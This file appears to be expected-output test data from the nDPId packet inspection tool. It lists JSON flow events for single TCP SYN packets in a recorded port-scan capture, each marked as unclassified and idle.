-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 